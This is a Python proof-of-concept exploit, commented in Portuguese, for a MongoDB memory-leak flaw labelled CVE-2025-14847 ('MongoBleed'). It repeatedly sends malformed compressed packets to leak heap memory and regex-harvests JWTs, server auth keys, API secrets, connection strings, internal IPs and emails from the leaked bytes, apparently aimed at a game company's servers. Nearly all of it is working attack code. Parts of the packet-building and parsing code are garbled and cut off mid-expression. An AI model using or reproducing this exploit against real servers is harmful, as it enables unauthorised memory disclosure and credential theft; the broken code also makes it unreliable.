#!/usr/bin/env python3 """ CVE-2025-14847 (MongoBleed) - Advanced Live Leaker PoC Autor: Equipe de Pesquisa em Segurança Licença: MIT (Uso Educacional Apenas) Esta versão avançada testa incrementalmente diferentes tamanhos de documento para maximizar a extração de dados vazados da memória heap do MongoDB. """ import argparse import socket import struct import zlib import re import signal import sys import time import json from datetime import datetime from typing import Dict, Set, List, Optional from collections import defaultdict # Conteúdo BSON padrão: campo int32 "a" = 1 DEFAULT_CONTENT = b'\x10a\x00\x01\x00\x00\x00' # Padrões de interesse para R6 (mesmos da poc_PT.py) R6_PATTERNS = { "Token_JWT": rb"eyJ[A-Za-z0-9_\-]+\.[A-Za-z0-9_\-]+\.[A-Za-z0-9_\-]+", "Auth_Servidor_R6": rb"R6S_SERVER_AUTH_[A-Z0-9]{32,}", "Chave_Analytics_R6": rb"R6S_ANALYTICS_KEY_[a-z0-9]{30,}", "Chave_Telemetria_R6": rb"R6S_TELEMETRY_KEY_[a-z0-9]{30,}", "Segredo_API_Ubisoft": rb"UPLAY_API_SECRET_[a-z0-9]{30,}", "UUID": rb"[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}", "URL_MongoDB": rb"mongodb://[a-zA-Z0-9_\-:@./]+", "IP_Interno": rb"10\.\d{1,3}\.\d{1,3}\.\d{1,3}", "Time_Pro": rb"(W7M Esports|FaZe Clan|Team Liquid|G2 Esports|FURIA)", "ID_Partida": rb"match_uuid_[a-f0-9\-]{36,}", "Email": rb"[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+", "Senha_Hash": rb"[a-f0-9]{32,}", } class LiveLeaker: """ Explorador incremental de vazamentos MongoDB Testa diferentes tamanhos para maximizar extração de dados """ def __init__(self, host: str, port: int, min_len: int, max_len: int, offset: int, timeout: float, sleep_time: float, verbose: bool = False): self.host = host self.port = port self.min_len = min_len self.max_len = max_len self.offset = offset self.timeout = timeout self.sleep_time = sleep_time self.verbose = verbose # Estatísticas self.stats = { 'tentativas': 0, 'sucessos': 0, 'falhas': 0, 'vazamentos_unicos': 0, 'inicio': datetime.now().isoformat() } # Armazenamento de vazamentos únicos self.leaks_vistos: Set[str] = set() self.leaks_por_categoria: Dict[str, Set[str]] = defaultdict(set) # Controle de interrupção signal.signal(signal.SIGINT, self._signal_handler) def _signal_handler(self, sig, frame): """Handler para Ctrl+C""" print("\n\n[*] Interrompido pelo usuário") self._mostrar_resumo() sys.exit(0) def _construir_pacote(self, doc_len: int) -> bytes: """ Constrói pacote OP_COMPRESSED malicioso Similar à função original mas encapsulada """ # Blob BSON mínimo bson = struct.pack(' bytes: """Recebe uma mensagem completa baseada no campo de tamanho""" response = b'' while True: try: chunk = sock.recv(4096) if not chunk: break response += chunk if len(response) >= 4: msg_len = struct.unpack('= msg_len: return response[:msg_len] except socket.timeout: break return response def _analisar_padroes_r6(self, dados: bytes) -> Dict[str, List[str]]: """Analisa dados em busca de padrões específicos do R6""" resultados = {} for categoria, padrao in R6_PATTERNS.items(): matches = re.findall(padrao, dados) if matches: matches_str = [m.decode('utf-8', errors='ignore') for m in matches] matches_unicos = list(set(matches_str)) # Filtra matches que já vimos novos = [m for m in matches_unicos if m not in self.leaks_por_categoria[categoria]] if novos: resultados[categoria] = novos self.leaks_por_categoria[categoria].update(novos) return resultados def _tentar_vazamento(self, doc_len: int) -> Optional[bytes]: """Tenta vazar memória com tamanho específico de documento""" self.stats['tentativas'] += 1 pacote = self._construir_pacote(doc_len) try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(self.timeout) sock.connect((self.host, self.port)) sock.sendall(pacote) response = self._receber_mensagem(sock) sock.close() if len(response) >= 25: self.stats['sucessos'] += 1 return response else: self.stats['falhas'] += 1 return None except Exception as e: self.stats['falhas'] += 1 if self.verbose: print(f"[!] Erro doc_len={doc_len}: {e}") return None def _processar_resposta(self, response: bytes, doc_len: int) -> bool: """Processa resposta e extrai vazamentos""" try: msg_len = struct.unpack(' 5: print(f" └─ ... e mais {len(vazamentos_simples)-5}") encontrou_algo = True if padroes_r6: print(f"\n[!] PADRÕES R6 DETECTADOS (doc_len={doc_len}):") for categoria, matches in padroes_r6.items(): print(f" [{categoria}] {len(matches)} novo(s):") for m in matches[:3]: # Mostra max 3 por categoria if len(m) > 70: m = m[:67] + "..." print(f" └─ {m}") if len(matches) > 3: print(f" └─ ... e mais {len(matches)-3}") encontrou_algo = True if encontrou_algo: self.stats['vazamentos_unicos'] += len(vazamentos_simples) + sum(len(v) for v in padroes_r6.values()) return encontrou_algo def _mostrar_progresso(self, doc_len: int): """Mostra progresso periodicamente""" if self.stats['tentativas'] % 100 == 0: taxa_sucesso = (self.stats['sucessos'] / self.stats['tentativas'] * 100) if self.stats['tentativas'] > 0 else 0 print(f"\r[*] Progresso: doc_len={doc_len}/{self.max_len} | " f"Tentativas={self.stats['tentativas']} | " f"Taxa sucesso={taxa_sucesso:.1f}% | " f"Vazamentos únicos={self.stats['vazamentos_unicos']}", end='', flush=True) def _mostrar_resumo(self): """Mostra resumo final das estatísticas""" print("\n\n" + "="*60) print("RESUMO DA SESSÃO DE LIVE LEAKING") print("="*60) print(f"Início: {self.stats['inicio']}") print(f"Fim: {datetime.now().isoformat()}") print(f"\nEstatísticas:") print(f" - Tentativas totais: {self.stats['tentativas']}") print(f" - Sucessos: {self.stats['sucessos']}") print(f" - Falhas: {self.stats['falhas']}") print(f" - Vazamentos únicos: {self.stats['vazamentos_unicos']}") if self.leaks_por_categoria: print(f"\nVazamentos por categoria:") for categoria, leaks in self.leaks_por_categoria.items(): print(f" - {categoria}: {len(leaks)}") print("="*60) def executar(self, salvar_json: Optional[str] = None): """ Loop principal de exploração incremental """ print(f"\n{'='*60}") print(f"[!] MongoBleed Live Leaker Avançado") print(f"[!] Alvo: {self.host}:{self.port}") print(f"[!] Faixa: doc_len {self.min_len} → {self.max_len} (offset={self.offset})") print(f"{'='*60}\n") print("[*] Transmitindo apenas vazamentos únicos (Ctrl+C para parar)") print("[*] Aguarde detecção de padrões R6...\n") doc_len = self.min_len while True: # Reinicia ciclo se atingir máximo if doc_len > self.max_len: doc_len = self.min_len # Mostra progresso if not self.verbose: self._mostrar_progresso(doc_len) # Tenta vazamento response = self._tentar_vazamento(doc_len) if response: self._processar_resposta(response, doc_len) # Incrementa e aguarda doc_len += 1 time.sleep(self.sleep_time) # Salva resultados se solicitado if salvar_json: self._salvar_resultados(salvar_json) def _salvar_resultados(self, arquivo: str): """Salva resultados em JSON""" resultado = { 'estatisticas': self.stats, 'vazamentos_por_categoria': {k: list(v) for k, v in self.leaks_por_categoria.items()}, 'total_vazamentos': self.stats['vazamentos_unicos'] } with open(arquivo, 'w', encoding='utf-8') as f: json.dump(resultado, f, indent=2, ensure_ascii=False) print(f"\n[+] Resultados salvos em: {arquivo}") def main() -> int: banner = """ ╔══════════════════════════════════════════════════════════╗ ║ CVE-2025-14847: MongoBleed Live Leaker Avançado ║ ║ Exploração Incremental com Detecção de Padrões R6 ║ ║ AVISO: Apenas Testes Autorizados ║ ╚══════════════════════════════════════════════════════════╝ """ print(banner) parser = argparse.ArgumentParser( description="MongoBleed Live Leaker Avançado - Exploração incremental", formatter_class=argparse.RawDescriptionHelpFormatter, epilog=""" Exemplos: # Exploração padrão %(prog)s --host 127.0.0.1 # Faixa customizada com verbose %(prog)s --host 127.0.0.1 --min 50 --max 10000 --verbose # Salvar resultados em JSON %(prog)s --host 127.0.0.1 --save resultados.json """ ) parser.add_argument("--host", default="127.0.0.1", help="IP/hostname do alvo") parser.add_argument("--port", type=int, default=27017, help="Porta do alvo (padrão: 27017)") parser.add_argument("--min", dest="min_len", type=int, default=20, help="Tamanho mínimo do doc_len (padrão: 20)") parser.add_argument("--max", dest="max_len", type=int, default=32768, help="Tamanho máximo do doc_len (padrão: 32768)") parser.add_argument("--offset", type=int, default=500, help="Offset do buffer (padrão: 500)") parser.add_argument("--timeout", type=float, default=2.0, help="Timeout do socket em segundos (padrão: 2.0)") parser.add_argument("--sleep", type=float, default=0.001, help="Sleep entre iterações em segundos (padrão: 0.001)") parser.add_argument("--verbose", action="store_true", help="Modo verbose (mostra todos os erros)") parser.add_argument("--save", help="Salvar resultados em arquivo JSON") args = parser.parse_args() # Validação de entrada if args.min_len < 1 or args.max_len > 100000: print("[-] Erro: Faixa de doc_len deve estar entre 1 e 100000") return 1 if args.min_len >= args.max_len: print("[-] Erro: --min deve ser menor que --max") return 1 # Executa live leaker leaker = LiveLeaker( host=args.host, port=args.port, min_len=args.min_len, max_len=args.max_len, offset=args.offset, timeout=args.timeout, sleep_time=args.sleep, verbose=args.verbose ) try: leaker.executar(salvar_json=args.save) except KeyboardInterrupt: pass return 0 if __name__ == "__main__": raise SystemExit(main())